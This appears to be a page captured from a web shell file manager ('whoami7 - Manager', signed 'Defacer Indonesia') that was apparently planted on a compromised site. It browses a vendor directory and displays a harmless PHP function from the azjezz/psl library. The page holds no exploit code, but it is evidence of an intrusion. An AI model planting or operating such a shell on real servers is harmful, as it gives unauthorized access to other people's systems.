whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
azjezz
/
psl
/
src
/
Psl
/
Type
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/azjezz/psl/src/Psl/Type/nullable.php
<?php declare(strict_types=1); namespace Psl\Type; /** * @template T * * @param TypeInterface<T> $inner_type * * @return TypeInterface<T|null> */ function nullable(TypeInterface $inner_type): TypeInterface { return new Internal\NullableType($inner_type); }
Copyright ©2021 || Defacer Indonesia